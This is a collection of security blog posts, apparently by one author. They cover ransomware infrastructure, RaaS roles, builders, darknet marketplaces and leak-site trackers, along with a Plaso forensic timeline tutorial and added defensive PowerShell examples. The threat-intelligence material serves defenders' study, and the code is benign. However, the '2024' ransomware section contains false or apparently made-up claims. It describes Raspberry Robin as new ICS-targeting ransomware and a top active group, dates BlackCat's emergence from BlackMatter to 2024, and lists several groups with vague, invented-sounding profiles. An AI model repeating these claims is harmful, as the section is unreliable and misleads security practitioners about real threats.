
- Understanding Ransomware Hosting and Affiliate Programs
Ransomware attacks continue to evolve, and so do the tactics used by ransomware actors. One of the key components in their operations is the infrastructure they use, often hosted on what are known as bulletproof hosting (BPH) sites. In addition to BPH, these actors also utilize virtual private servers (VPSs) and have sophisticated affiliate programs to expand their reach.

What is Bulletproof Hosting (BPH)?
Bulletproof hosting (BPH) providers offer hosting services without any concern for the type of content being hosted. This makes them ideal for cybercriminals, including ransomware operators, who need to host malicious infrastructure. These providers often operate in countries that have lenient privacy policies and no extradition agreements with countries like the United States.
Why BPH? Unlike regular hosting providers that respond to abuse reports, BPH providers ignore these reports, allowing illegal activities to continue.
Finding BPH: These services are often advertised and purchased on darknet forums.
https://intel471.com/blog/top-bulletproof-hosting-providers-yalishanda-ccweb-brazzzers-2021

Virtual Private Servers (VPS)
In addition to BPH, ransomware actors frequently use virtual private servers (VPS) from companies like DigitalOcean and Vultr. These servers offer more flexibility and anonymity.
How it works: Attackers spin up a VPS, use it for a few attacks, and then shut it down to avoid detection. This process is repeated multiple times.
Identifying VPS: Sometimes, a whois lookup on an IP address used by attackers can reveal its VPS origin. For instance, Vultr uses Choopa autonomous system numbers (ASNs), which can be identified by the prefix "CHOOPA-ASN".

Ransomware Affiliate Programs
Ransomware groups have professionalized their operations by creating affiliate programs. These programs are similar to business partnerships where the ransomware developers and affiliates share profits from successful attacks.
Evolution: Initially, these programs were informal partnerships. Today, they are structured programs managed by project managers.
Rules and Marketing: Ransomware groups often provide specific rules for their affiliates and market their programs to attract skilled partners.

Example: Notable Ransomware Affiliate Programs
One of the well-known ransomware groups with an affiliate program is the BlackCat/ALPHV group. Their affiliate program is frequently cited as a sophisticated example of how ransomware operations are run like businesses.
BlackCat/ALPHV: This group offers a well-structured affiliate program. For more detailed information, you can read Group-IB's analysis titled "Fat Cats: An analysis of the BlackCat ransomware affiliate program":
https://www.group-ib.com/blog/blackcat/

Conclusion
By staying informed about these tactics and adopting strong security practices, organizations can better protect themselves against these evolving threats.
Akash Patel
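The whois check described under "Identifying VPS" is easy to turn into a small triage step for the attacker IPs you pull out of your own logs. The PowerShell below is an added example, not code from the original post: it parses raw whois text into fields and flags records whose ASN name starts with a watchlisted prefix. CHOOPA-ASN comes from the post; DIGITALOCEAN-ASN is an assumed prefix, and the whois record, the AS number (taken from the documentation range) and the IP are constructed sample data rather than real lookups.

```powershell
# Added example (not from the original post): flag attacker IPs that sit on disposable VPS
# infrastructure by matching the ASN name in their whois record against a watchlist.
# CHOOPA-ASN is from the post; DIGITALOCEAN-ASN is an assumed prefix. The sample record,
# AS number and IP below are constructed, not real lookups.

$VpsAsnPrefixes = @('CHOOPA-ASN', 'DIGITALOCEAN-ASN')   # ASN-name prefixes that indicate a VPS provider

function ConvertFrom-WhoisText {
    # Turn "Key: value" whois output into a hashtable (keys lower-cased, first value wins).
    param([Parameter(Mandatory)][string]$Text)
    $fields = @{}
    foreach ($line in ($Text -split "`r?`n")) {
        if ($line -match '^\s*(#|%)') { continue }                       # banner / comment lines
        if ($line -match '^\s*([A-Za-z][\w-]*)\s*:\s*(.+?)\s*$') {
            $key = $Matches[1].ToLower()
            if (-not $fields.ContainsKey($key)) { $fields[$key] = $Matches[2] }
        }
    }
    return $fields
}

function Test-VpsOrigin {
    # Returns one object per IP saying whether its ASN name matches a watchlisted VPS prefix.
    param(
        [Parameter(Mandatory)][string]$Ip,
        [Parameter(Mandatory)][string]$WhoisText
    )
    $f = ConvertFrom-WhoisText -Text $WhoisText
    $asName = if ($f.ContainsKey('asname')) { $f['asname'] } else { '' }
    $hit = $VpsAsnPrefixes | Where-Object { $asName.ToUpper().StartsWith($_) } | Select-Object -First 1
    [pscustomobject]@{
        Ip         = $Ip
        Asn        = $f['originas']
        AsName     = $asName
        OrgName    = $f['orgname']
        IsKnownVps = [bool]$hit
        Matched    = $hit
    }
}

# Constructed sample whois record (AS64496 is from the documentation range; the org is fictional).
$sampleWhois = @"
# ARIN WHOIS data and services are subject to the Terms of Use
NetName:        EXAMPLE-VPS-NET
OriginAS:       AS64496
ASName:         CHOOPA-ASN
OrgName:        Example VPS Provider
Country:        US
"@

# In practice feed the output of a whois client (e.g. Sysinternals whois.exe) for each suspect IP.
# IsKnownVps = True means the address is likely disposable: block and watch it, but do not
# expect it to stay meaningful as a long-lived indicator.
Test-VpsOrigin -Ip '203.0.113.10' -WhoisText $sampleWhois | Format-List
```

A VPS hit is a hint about the actor's tradecraft (spin up, attack, tear down), not an attribution; the useful follow-up is to look for the same ASN across other connections in the same time window rather than to pin the IP itself.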
- Running Plaso/Log2Timeline on Windows
In my previous blog, A Deep Dive into Plaso Log2Timeline Forensic Tools, I covered how to use Plaso Log2Timeline on Ubuntu and parse the timeline. However, I understand that Ubuntu might not be feasible for everyone, so in this post we'll discuss how to run Plaso on Windows. Note that all command parsers will be the same as in the previous blog.
Blog link: https://www.cyberengage.org/post/a-deep-dive-into-plaso-log2timeline-forensic-tools

Getting Started with Docker Desktop
To run Plaso/Log2Timeline on Windows, you'll need Docker Desktop. Follow these steps to get started:
Download Docker Desktop: Docker Desktop
Install Docker: No need to sign in. Just follow the installation prompts and configure it as you would with any other application.

Installing Plaso with Docker
There are two ways to install Plaso with Docker:
Manual Installation: Follow the documentation. https://plaso.readthedocs.io/en/latest/sources/user/Installing-with-docker.html
Docker Pull: Simply search for plaso2timeline in Docker and pull the image.
Choose the method that suits you best.

Testing Your Plaso Docker Image
To test your Plaso Docker image, run the following command in PowerShell (ensure Docker is running with administrator privileges):
(PowerShell only)
docker run log2timeline/plaso log2timeline.py --version
If you get an output, it means Plaso is running successfully.

Let's start with the main stuff :)

Collecting Artifacts
The first step in analysis is to collect artifacts. I recommend using KAPE, which simplifies the process. If possible, collect data in .vhdx format.
Mount the Drive: After collecting the artifacts, mount the drive.

Analysis Methods
Once collection is done, you can parse/analyze the artifacts in two ways (as I see it):
1. Parse all artifacts separately using Eric Zimmerman's tools, then collect all outputs into one .plaso file for analysis. This method is time-consuming but effective.
2. Parse most artifacts with Plaso and the $MFT with Eric Zimmerman's MFTECmd tool, then merge them together. Although Plaso can parse the $MFT, I prefer using MFTECmd.
I will proceed with the second method.

1. Parsing Artifacts with Plaso
To parse all artifacts except the $MFT, use the following command in PowerShell:
docker run -v E:/C:/data -v D:/Plaso:/output log2timeline/plaso log2timeline.py --parsers '!mft,!usnjrnl,!filestat' --hashers md5 --status_view window --storage_file /output/akash.plaso /data
Explanation:
-v E:/C:/data: Maps the E:\C directory (E: is the drive, \C the folder inside it) to /data in the Docker container.
-v D:/Plaso:/output: Maps the D:\Plaso directory to /output in the Docker container.
log2timeline/plaso: Specifies the Docker image.
log2timeline.py: The command to run inside the container.
--parsers '!mft,!usnjrnl,!filestat': Excludes the MFT, USN Journal, and file statistics parsers.
--hashers md5: Uses MD5 hashing.
--status_view window: Sets the status view to a windowed interface.
--storage_file /output/akash.plaso: Specifies the output file path inside the Docker container.
/data: The source directory inside the Docker container.
This command will run Plaso on the contents of E:\C and save the output to D:\Plaso\akash.plaso.

2. Parsing the $MFT with MFTECmd
To parse the $MFT using MFTECmd, run the following command in CMD:
MFTECmd.exe --body D:\Plaso --bodyf D:\Plaso\HOSTNAME.mft.bodyfile --bdl C -f "E:\C\$MFT"
Explanation:
--body D:\Plaso: Output directory.
--bodyf: Specifies the bodyfile name (HOSTNAME.mft.bodyfile).
--bdl C: Specifies the drive letter to use with the bodyfile.
-f "E:\C\$MFT": Path to the MFT file.

3. Adding MFT Data to the Plaso File
Parse the MFT bodyfile and add the data to your Plaso file (in my case akash.plaso) with the following command (PowerShell):
docker run -v D:/Plaso:/output log2timeline/plaso log2timeline.py --parsers 'mactime' --hashers md5 --status_view window --storage_file /output/akash.plaso /output/HOSTNAME.mft.bodyfile
Explanation:
docker run: Starts a Docker container.
-v D:/Plaso:/output: Mounts the D:/Plaso directory to /output inside the container.
log2timeline/plaso: Specifies the Docker image.
log2timeline.py: Command to run inside the container.
--parsers 'mactime': Specifies the parsers to include.
--hashers md5: Uses MD5 hashing.
--status_view window: Sets the status view type.
--storage_file /output/akash.plaso: Specifies the storage file for the timeline.
/output/HOSTNAME.mft.bodyfile: Input bodyfile.
You now have a final akash.plaso file that includes the MFT data as parsed by MFTECmd and all other artifacts parsed by the log2timeline parsers. From here you can transfer this output into Elasticsearch or any tool you want, or parse it into CSV format for further analysis with Timeline Explorer.

4. Importing the Plaso File into Elasticsearch for Timesketch
To import the Plaso file into Elasticsearch for use with Timesketch, use the following command (PowerShell):
docker run -v D:/Plaso:/output log2timeline/plaso psort.py -o elastic --index_name example_host --server 127.0.0.1 --port 9200 /output/akash.plaso
Alternatively, you can use the Timesketch importer:
timesketch_importer -u [username] -p [password] --host http://127.0.0.1 --index_name HOSTNAME --sketch_name EXAMPLE --timeline_name HOSTNAME /output/akash.plaso

4.1 Exporting to CSV for Timeline Explorer
You can also parse the akash.plaso file and create a CSV output for analysis with Timeline Explorer (PowerShell):
docker run -v D:/Plaso:/output log2timeline/plaso psort.py --output-time-zone utc -o l2tcsv -w /output/timeline.csv /output/akash.plaso
Explanation:
docker run: Starts a Docker container.
-v D:/Plaso:/output: Mounts the D:/Plaso directory to /output inside the container.
log2timeline/plaso: Specifies the Docker image.
psort.py: Command to run inside the container.
--output-time-zone utc: Time zone used for the output timestamps.
-o l2tcsv: Output format for analysis.
-w /output/timeline.csv: Writes the output to this file.
/output/akash.plaso: Input storage file that will be converted into CSV.

Additional Notes
For detailed information on commands such as using a time range for analysis, parsers, and filters, refer to my previous blog. You can adjust the commands for running Plaso on Docker as needed.
https://www.cyberengage.org/post/a-deep-dive-into-plaso-log2timeline-forensic-tools
By following these steps, you can efficiently run Plaso on Windows and perform comprehensive forensic analysis. Happy analyzing!
Akash Patel
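The four steps above are one procedure, so here they are as a single PowerShell script. This is an added example, not a script from the original post or from the Plaso project: it assumes the mounted collection is at E:\C, D:\Plaso is the working directory, MFTECmd.exe is on PATH, and it keeps the post's names (akash.plaso, HOSTNAME). It differs from the post in two places, both on purpose: it uses --status_view linear so the container needs no terminal, and the optional Elasticsearch step points at host.docker.internal rather than 127.0.0.1, because inside the container 127.0.0.1 is the container itself.

```powershell
# Added example (not from the original post): the Plaso-on-Docker workflow as one script.
# Assumptions: collection mounted at E:\C, working directory D:\Plaso, MFTECmd.exe on PATH,
# Docker Desktop running, executed from an elevated PowerShell.
$ErrorActionPreference = 'Stop'

$SourceMount = 'E:/C'        # host side of the /data mount (forward slashes for docker -v)
$WorkMount   = 'D:/Plaso'    # host side of the /output mount
$WorkDirWin  = 'D:\Plaso'    # same directory in Windows form, for MFTECmd
$MftPath     = 'E:\C\$MFT'   # single quotes: in double quotes "$MFT" would be expanded as a variable
$HostName    = 'HOSTNAME'
$Storage     = 'akash.plaso'
$Image       = 'log2timeline/plaso'

function Invoke-Plaso {
    # Run one Plaso tool inside the container with both mounts; stop the script on a non-zero exit.
    param([Parameter(Mandatory)][string[]]$Arguments)
    & docker run --rm -v "${SourceMount}:/data" -v "${WorkMount}:/output" $Image @Arguments
    if ($LASTEXITCODE -ne 0) { throw "docker run $($Arguments[0]) failed with exit code $LASTEXITCODE" }
}

# 0. Same sanity check as the post: does the image run at all?
Invoke-Plaso -Arguments @('log2timeline.py', '--version')

# 1. Every parser except mft/usnjrnl/filestat; the $MFT comes from MFTECmd in step 2.
#    --status_view linear prints plain progress lines, so no TTY is needed (the curses
#    "window" view from the post needs an interactive terminal).
Invoke-Plaso -Arguments @(
    'log2timeline.py',
    '--parsers', '!mft,!usnjrnl,!filestat',
    '--hashers', 'md5',
    '--status_view', 'linear',
    '--storage_file', "/output/$Storage",
    '/data')

# 2. $MFT -> bodyfile with MFTECmd (runs on the Windows host, not in the container).
$BodyFile = "$HostName.mft.bodyfile"
& MFTECmd.exe --body $WorkDirWin --bodyf "$WorkDirWin\$BodyFile" --bdl C -f $MftPath
if ($LASTEXITCODE -ne 0) { throw "MFTECmd failed with exit code $LASTEXITCODE" }
if (-not (Test-Path "$WorkDirWin\$BodyFile")) { throw "bodyfile was not created: $WorkDirWin\$BodyFile" }

# 3. Append the bodyfile to the same storage file with the mactime parser.
Invoke-Plaso -Arguments @(
    'log2timeline.py',
    '--parsers', 'mactime',
    '--hashers', 'md5',
    '--status_view', 'linear',
    '--storage_file', "/output/$Storage",
    "/output/$BodyFile")

# 4.1 Export a UTC CSV for Timeline Explorer.
Invoke-Plaso -Arguments @(
    'psort.py',
    '--output-time-zone', 'utc',
    '-o', 'l2tcsv',
    '-w', '/output/timeline.csv',
    "/output/$Storage")

# 4 (optional). Push to Elasticsearch for Timesketch. 127.0.0.1 inside the container is the
# container itself; host.docker.internal is Docker Desktop's alias for the Windows host.
# Elasticsearch index names must be lower-case, hence ToLower().
# Invoke-Plaso -Arguments @('psort.py', '-o', 'elastic', '--index_name', $HostName.ToLower(),
#     '--server', 'host.docker.internal', '--port', '9200', "/output/$Storage")
```

Each step checks $LASTEXITCODE, so a failed MFTECmd run or a missing bodyfile stops the script before the mactime step silently appends nothing to akash.plaso, which is the failure mode that is hardest to notice afterwards in the timeline.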
- How Ransomware Operators Communicate and Share Data
The darknet is a hidden part of the internet where anonymity is paramount. It's a favorite spot for ransomware operators and other cybercriminals to communicate and share data.

Downloading Large Data Leaks Over Tor
Downloading large data leaks over Tor can be challenging due to its slow speeds and the size of the files. However, there's a detailed guide that can assist you in this process.
https://0ut3r.space//2022/09/30/big-files-from-tor/

Communication Channels Used by Ransomware Groups
Tox: Tox is an encrypted instant messaging system that uses Tor circuits to anonymize communications. Ransomware groups like LockBit 3.0 prefer Tox for its real-time, anonymous chat capabilities. https://tox.chat/
Telegram and RocketChat: These messaging platforms are popular among ransomware operators for their encryption and ease of use. They provide a way for threat actors to communicate and coordinate their activities without revealing their identities.
Darknet Forums: Darknet forums are critical hubs for ransomware communications. Some of the most popular forums include:
XSS.is
Exploit.in
RAMP
Hack Forums
BreachForums
CryptBB
These forums are where cybercriminals share information, tools, and services. While anyone can create an anonymous account on most of these forums, it's crucial to exercise strict operational security (OpSec) practices to avoid detection and tracking.

Operational Security (OpSec) Tips
When accessing darknet forums or communicating with threat actors, always adhere to OpSec principles:
Use a VPN and Tor: Ensure all your online activities are anonymized through a combination of VPN and Tor. This adds layers of encryption and anonymity.
Avoid Personal Information: Never use your real name, email, or any identifiable information.
Be Cautious in Conversations: Be mindful of what you discuss. Criminals on these forums are often adept at analyzing behavior and communication patterns.
Anonymize Your Typing Style: Even the way you type and the words you use can be traced back to you. Be consistent and avoid using distinctive language or emojis.

Latest Developments in Ransomware Communications
In 2024, the ransomware landscape continues to evolve. Here are some of the latest trends:
Increased Use of AI: Some ransomware groups are leveraging AI to automate parts of their operations, from initial infiltration to data exfiltration.
Sophisticated Phishing Campaigns: Ransomware groups are using more advanced phishing techniques to gain access to networks. These include deepfake voice phishing (vishing) and highly personalized spear-phishing emails.
Ransomware-as-a-Service (RaaS): The RaaS model is growing, with more groups offering ransomware kits to affiliates. This model allows less technically skilled criminals to launch sophisticated attacks.
Double and Triple Extortion: Beyond just encrypting data, attackers now also steal and threaten to release it (double extortion). Some go further by adding DDoS attacks to the mix (triple extortion), creating multiple layers of pressure on victims.
Collaboration Between Groups: There's an increasing trend of collaboration between different ransomware groups. They share resources, intelligence, and even jointly execute attacks to maximize impact.

Conclusion
Navigating the darknet and understanding the communication methods of ransomware operators is crucial for cybersecurity professionals. By staying informed about the latest trends and practicing strong OpSec, you can better protect yourself and your organization from these evolving threats.
Akash Patel
- Understanding the Ransomware Extortion Types, DLSs, Resources
Ransomware attacks are a major threat today, constantly evolving to keep victims under pressure.

Types of Ransomware Extortion
Data Encryption: The most common form of ransomware attack involves encrypting the victim's data. This means the data and services are inaccessible until a ransom is paid.
Data Extortion: Made popular by the MAZE Team, this method involves stealing (exfiltrating) data from the victim. The attackers then threaten to release this data publicly if the ransom isn't paid. This led to the creation of Data Leak Sites (DLSs) where stolen data is published.
Multi-Extortion: This advanced method combines several forms of pressure. Attackers may contact the victim's suppliers, partners, regulatory bodies, or VIPs. They might also launch Distributed Denial of Service (DDoS) attacks, making it even harder for the victim to recover.
Double Extortion: This is a combination of data encryption and data extortion. Attackers not only lock the victim's data but also steal it, threatening to release it if the ransom isn't paid. The MAZE Team popularized this method in 2019.

Data Leak Sites (DLSs)
DLSs, also known as "shaming sites," are used by ransomware groups to advertise their breaches. These sites list the stolen data and threaten to release it publicly. Organizations fear these sites because they can lead to significant business and reputational damage.
1. The Ransom Watch site provides a group index, recent DLS posts, group profiles, and statistic/graph pages: https://ransomwatch.telemetry.ltd/#/README
2. The Ransom Look site provides a group index, forum and market links, a listing of data leaks, Telegram messages, and statistic/graph pages. The team also maintains a GitHub repo that you can review: https://www.ransomlook.io/ https://github.com/RansomLook/RansomLook
3. The Ransom.Wiki site focuses more on allowing users to search for recent victims and/or ransomware groups by name: https://ransom.wiki/
4. Dark Feed provides several resources for identifying ransomware DLS and blog information: https://darkfeed.io/ransomwiki/ https://darkfeed.io/ransomgroups/
5. Fastfire's deepdarkCTI GitHub repo provides and maintains a list of ransomware group sites called "ransomware_gang.md": https://github.com/fastfire/deepdarkCTI/blob/main/ransomware_gang.md
6. The "Ransomware Group Sites" Wiki is a .onion site and must be accessed via Tor. This site provides links to various data leak and victim portal sites: http://ransomwr3tsydeii4q43vazm7wofla5ujdajquitomtd47cxjtfgwyyd[.]onion/

Conclusion
Always stay updated with the latest developments in ransomware tactics to safeguard your data and services.
Akash Patel
- Ever-Evolving World of Ransomware: Evolution Over Time
Ransomware is a constantly changing threat. It's like a game of whack-a-mole for researchers: as soon as you think you've understood one group, they rebrand or change tactics.

Ransomware Groups: Names and Tactics
Ransomware groups often change their names and tactics. It's like how fashion trends change, but much more dangerous. For example, a group might start as "Group A," then change to "Group B" after a few months. This makes it hard for researchers to keep track. Each group has its own tactics, techniques, and procedures (TTPs). These are like the group's signature moves. Over time, these TTPs can change, making it even harder to track them.

Tracking Ransomware Groups
Researchers use various methods to track these groups. One helpful resource is the "Ransomware Playbook," a Google Sheet maintained by Seongsu Park. This sheet lists the TTPs of different groups. You can check it out here. However, it's not always straightforward. Affiliates (the people who help spread the ransomware) don't stick to one group. They might use the same TTPs for different groups, adding to the confusion.

Group Evolution Over Time (2024 Update)

| Original Group | Evolution 1   | Evolution 2        | Evolution 3                    | Evolution 4 |
|----------------|---------------|--------------------|--------------------------------|-------------|
| Cerber         | GandCrab      | REvil (Sodinokibi) | -                              | -           |
| BitPaymer      | Doppel Paymer | Grief              | -                              | -           |
| Wasted Locker  | Hades         | Phoenix            | Macaw                          | -           |
| MAZE           | Sekhmet       | Egregor            | -                              | -           |
| DarkSide       | BlackMatter   | BlackCat/ALPHV     | -                              | -           |
| Defray777      | RansomEXX     | -                  | -                              | -           |
| Mount Locker   | Astro Locker  | Xing Locker        | -                              | -           |
| Vasa Locker    | Babuk         | Payload.bin        | Groove                         | -           |
| SynACK         | El_Cometa     | -                  | -                              | -           |
| Prometheus     | Spook         | -                  | -                              | -           |
| Nemty          | Nefilim       | Karma              | -                              | -           |
| Hermes         | Ryuk          | Conti              | BlackBasta, Karakurt, & others | -           |
| Quantum        | DAGON Locker  | -                  | -                              | -           |
| Chaos          | Yashma        | ONYX               | SolidBit                       | -           |
| MedusaLocker   | Medevil       | -                  | -                              | -           |
| SunCrypt       | MoonCrypt     | -                  | -                              | -           |
| FiveHands      | EvilCorp      | -                  | -                              | -           |

Key Changes in 2024:
Phoenix evolved into Macaw.
BlackCat/ALPHV emerged from BlackMatter.
ONYX evolved into SolidBit.
Groove emerged from Payload.bin.
BlackBasta and Karakurt continued evolving from Conti.

New Ransomware Groups in 2024:
Raspberry Robin: New ransomware variant targeting industrial control systems.
HydraCrypt: Known for its sophisticated encryption methods and targeting financial institutions.
NightSky: Focuses on healthcare and has caused significant disruptions in hospitals.
PolarBear: Targeting cloud infrastructure with advanced evasion techniques.
SilverStorm: Primarily targets government entities and critical infrastructure.

Top Five Industries Hit in 2024:
Healthcare
Financial Services
Manufacturing
Education
Government

Top Five Active Ransomware Groups in 2024:
BlackCat/ALPHV: Continues to evolve with new tactics and significant impact.
BlackBasta: Increased activity targeting a variety of sectors.
Conti: Despite setbacks, remains active with new offshoots like Karakurt.
Raspberry Robin: New but highly disruptive, especially in industrial sectors.
SilverStorm: Notable for targeting critical infrastructure with advanced methods.

A few more known ransomware groups as of 2024:
Akash Patel
- Understanding Ransomware-as-a-Service (RaaS) Part 4: RaaS Dashboards and Darknet Marketplaces
Introduction
Welcome back to our series on Ransomware-as-a-Service (RaaS)! In this post, we will explore RaaS dashboards and the role of darknet marketplaces in facilitating ransomware attacks. Understanding these components will give you a deeper insight into how ransomware operations are managed and executed. Let's dive in!

RaaS Dashboards: A Command Center for Cybercriminals
RaaS dashboards provide affiliates with an overview of their ransomware activities. These dashboards are packed with features that help affiliates monitor and manage their attacks effectively. Here's what you can typically find on a RaaS dashboard:
Key Features of RaaS Dashboards
Deployment Effectiveness: Affiliates can track how well their ransomware is spreading.
Statistical Analysis: Dashboards display statistics by country, operating system, and more.
Communication Tools: Some dashboards allow direct communication with victims for negotiation purposes, and many more.

Darknet Marketplaces: Buying and Selling Access
Initial Access Brokers (IABs) and other cybercriminals use darknet marketplaces to trade access to victim networks and stolen data. Let's take a closer look at how these transactions work.
Key Marketplaces
Odin: Focuses on selling remote access to victim networks.
Marketo: Specializes in selling and auctioning stolen data.
These marketplaces have evolved to be more anonymous. Initially, they provided detailed information about the victim organizations, but researchers began scraping this data and notifying potential victims. Now, the details are more generic, often including only the top-level domain, hosting provider, operating country, and access type.
Buying and Selling Access
Marketplaces are filled with forum posts where actors buy and sell access. For example:
Sellers: Offer access to various organizations, including corporations, institutions, and even governments. Access types include RDP, VNC, cPanel, SSH, and more.
Buyers: Seek access to organizations, primarily in the US, EU, and UK. Some buyers avoid targeting hospitals, governments, and educational institutions.
To avoid scams, many forums offer escrow services, ensuring that payments are held until both parties fulfill their part of the deal. Some forums even have dispute resolution systems similar to courts to handle disagreements between users.

Zero-Day Exploits and Social Engineering
The threats posed by RaaS operations extend beyond selling access and ransomware. Let's look at some concerning trends.
Zero-Day Exploits
IABs sometimes offer zero-day exploits, which are vulnerabilities that have not been disclosed or patched. These exploits can provide remote code execution capabilities, making them highly valuable to ransomware groups.
Social Engineering
Cybercriminals also use social engineering tactics to trick employees into installing ransomware within their company's network. For example, an email might offer a share of the ransom payment in exchange for helping to deploy the ransomware. LockBit, a notorious ransomware group, has been known to use this method. Proofpoint's 2022 Social Engineering report highlights such tactics, demonstrating the ongoing threat of social engineering in ransomware attacks.

Conclusion
Understanding the intricacies of RaaS dashboards and darknet marketplaces is crucial in grasping the full scope of ransomware operations. In our next post, we'll continue to explore the complex world of RaaS, focusing on how these operations impact organizations and what steps can be taken to mitigate these threats. Stay informed, stay vigilant, and stay safe.
Akash Patel
- Understanding Ransomware-as-a-Service (RaaS) Part 3: Exploring Ransomware Builders
Introduction
Welcome back to our series on Ransomware-as-a-Service (RaaS)! Today, we're diving into the world of ransomware builders, the tools that allow ransomware to be customized and deployed efficiently.

The Chaos Ransomware Builder
Ransomware builders are tools that enable cybercriminals to create customized ransomware payloads. One of the notable examples is the Chaos Ransomware Builder.
Main Menu Customization Options
The main menu of the Chaos Ransomware Builder offers several customization options for creating ransomware payloads:
Ransom Note Contents: Customizing the text of the ransom note that victims see.
Ransom Note Filename: Setting the filename for the ransom note.
Encrypted File Extension: Changing the extension of encrypted files (default is to randomize).
USB and Network Spreading: Enabling the ransomware to spread via USB drives and network shares.
Payload Process Name: Customizing the process name of the ransomware.
File Extensions to Target: Specifying which file types to encrypt.
Delay Prior to Encryption: Setting a delay before the encryption process starts.
Startup Persistence Options: Ensuring the ransomware runs on system startup.
Custom Executable Icon: Changing the icon of the ransomware executable.
Advanced Options
The Advanced Options section of the Chaos builder provides additional features for more sophisticated attacks:
Recovery Tampering Features: deleting Volume Shadow Copies, deleting the Windows Backup Catalog, disabling Windows Recovery, disabling the Task Manager.
Custom Wallpaper: Setting a custom wallpaper after encryption.
Creating a Decryptor: Generating a decryptor for the created ransomware payload.

Examples of Ransomware Builders
Leaked and Modified Builders
On various darknet forums, you can find screenshots of different ransomware builders. For instance:
Babuk Ransomware Builder: Leaked on RAID Forums (now known as Breached.to), allowing others to use or modify it. (The website has since been seized by the US government.)
Ryuk Builder: Modified versions are often sold, providing customized features for affiliates.
These builders, whether leaked or sold, highlight the ease with which ransomware can be distributed and customized.
OS-Specific Payloads
Some builders are capable of creating payloads for different operating systems, such as Linux and ESXi. This capability allows ransomware to target a wide range of environments. For example, ESXi payloads can encrypt all virtual machine (VM) files within an ESX cluster, potentially crippling entire networks.

The Impact of Ransomware Builders
The availability and customization options of ransomware builders significantly lower the barrier to entry for cybercriminals. With tools like the Chaos Ransomware Builder, even less technically skilled attackers can create and deploy ransomware effectively. This democratization of ransomware development has led to an increase in ransomware attacks, making it a pervasive threat in the cybersecurity landscape.

Conclusion
These tools enable the creation of customized and sophisticated ransomware, making it easier for attackers to launch effective attacks. In our next post, we'll explore the RaaS dashboard, RaaS marketplaces, and the process of selling access. Stay tuned as we continue to unravel the complexities of RaaS and its impact on cybersecurity.
Akash Patel
- Understanding Ransomware-as-a-Service (RaaS) Part 2: The Roles of Initial Access Brokers (IABs) and Ransomware Builders
Welcome back to our series on Ransomware-as-a-Service (RaaS)! Today, we're going to dig deeper into two key components: Initial Access Brokers (IABs) and Ransomware Builders. These elements are crucial to understanding how modern ransomware attacks are carried out.

The Role of Initial Access Brokers (IABs)
Initial Access Brokers (IABs) are like the front door openers for ransomware attacks. Their job is to get into victim networks and then sell that access to ransomware operators. Here's how they do it:
How IABs Get Access
Targeting: Some IABs attack any vulnerable system they can find (opportunistic). Others aim at specific industries or organizations to maximize their impact (targeted).
Tools and Tricks:
Vulnerability Search Engines: Websites like Shodan and Censys help IABs find weaknesses in systems connected to the internet.
MASSCAN: This tool can scan all the IP addresses in the world in under five minutes, helping IABs quickly find targets. Learn more about MASSCAN here.
Dark Web Markets: IABs buy and sell access to compromised networks on these underground sites.
What IABs Do
IABs handle the tricky parts of getting into a network, such as:
Phishing Attacks: Sending fake emails to trick people into giving up their login details.
Bypassing MFA: Finding ways around multi-factor authentication to get into systems.
Brute-Forcing Passwords: Trying many passwords quickly to guess the right one.
Scanning for Weaknesses: Constantly looking for vulnerable devices to exploit.

Ransomware Builders
Ransomware builders are tools that create customized ransomware payloads. Think of them as the factory where the ransomware is made to order for each attack.
How Ransomware Builders Work
Customization:
Data Leak Site (DLS) URLs: Setting up where stolen data will be published.
Email Addresses: Embedding contact details for ransom negotiations.
Encryption Keys: Generating unique keys for each attack.
Creating Payloads: Developers use these builders to create custom ransomware for each affiliate. Each version is unique and tailored to ensure the right person gets credit for the attack. Builders also embed specific public keys and custom ransom notes into the payloads, making each one different.

Handling Ransomware Payloads
If you find a ransomware payload on your network, be very careful with it. Uploading it to a malware analysis site like VirusTotal can expose victim-specific information, such as:
Private Chat Links: Access to communication between you and the ransomware operators.
Data Leak Sites: Information about where your stolen data might be published.
Always handle ransomware samples cautiously to avoid making things worse.

Conclusion
By understanding the roles of Initial Access Brokers and Ransomware Builders, we get a clearer picture of how organized and sophisticated ransomware attacks have become. In our next post, we'll explore more about ransomware builders, including some of the most infamous examples. Stay tuned as we continue to uncover the world of RaaS and how it impacts cybersecurity.
Akash Patel
- The Evolution of Ransomware: Understanding the Ransomware-as-a-Service (RaaS) Model
In our previous blog, we delved into the history and evolution of ransomware, from the AIDS Trojan to modern-day threats. Today, we turn our focus to a revolutionary concept that has significantly altered the ransomware landscape: Ransomware-as-a-Service (RaaS). This model has transformed ransomware operations into a streamlined, profit-driven industry.

The Advent of Ransomware-as-a-Service (RaaS)
Ransomware-as-a-Service, commonly known as RaaS, has revolutionized the cybercrime ecosystem. It provides a turn-key solution for ransomware operations, making it accessible even to those with limited technical expertise.

How RaaS Works
The general theory of the RaaS model is straightforward:
Development: A developer or a group of developers creates a ransomware payload. They might also develop a "builder," which can generate customized payloads on demand.
Subscription: The ransomware is offered through a subscription-based program, effectively leasing it out to third parties.
Affiliates: Those who lease the ransomware, known as affiliates, are responsible for deploying it within as many organizations as possible.
Profit Sharing: The profits from successful attacks are typically split between the developer and the affiliate, with a common split being 30% to the developer and 70% to the affiliate.

Roles in the RaaS Business Model
The RaaS ecosystem is structured with several specialized roles, each playing a crucial part in the success of ransomware campaigns:
Initial Access Brokers (IABs):
Role: IABs are responsible for gaining initial access to victim networks. They sometimes market themselves as "pentesters" to lend a sense of legitimacy to their work.
Method: They may exploit vulnerabilities, use phishing attacks, or purchase access credentials to infiltrate networks.
Affiliates:
Role: Affiliates use the access provided by IABs to deploy ransomware within victim environments.
Function: Their core tasks include exfiltrating data and deploying the ransomware payload.
Data Managers:
Role: These individuals handle and sort exfiltrated data.
Purpose: They identify and archive the most valuable information to use for extortion purposes.
Operators:
Role: The development crew behind the scenes.
Function: They develop and maintain the encryption payloads and associated infrastructure.
Negotiators:
Role: Negotiators handle ransom payment discussions.
Advice: It's crucial to be cautious when engaging with negotiators directly, as they are skilled in maximizing payouts.
Chasers:
Role: These individuals apply psychological pressure on victims to pay the ransom.
Methods: They may contact victims via phone or email, reach out to their business partners, or use other means to increase the urgency and stress of the situation.
Accountants:
Role: Accountants are responsible for money laundering and handling ransom payments.
Function: They ensure that payments are "cleaned" and can be used without detection, often holding payments for days or weeks before processing them.

Conclusion
The RaaS model has made ransomware attacks more organized and efficient, creating a thriving underground economy. In the next few blogs, we will delve deeper into each of these roles, examining how they contribute to the overall ransomware operation and discussing strategies for defense and mitigation. Stay tuned as we uncover more about the dark world of ransomware and the ongoing battle to protect our digital landscapes.
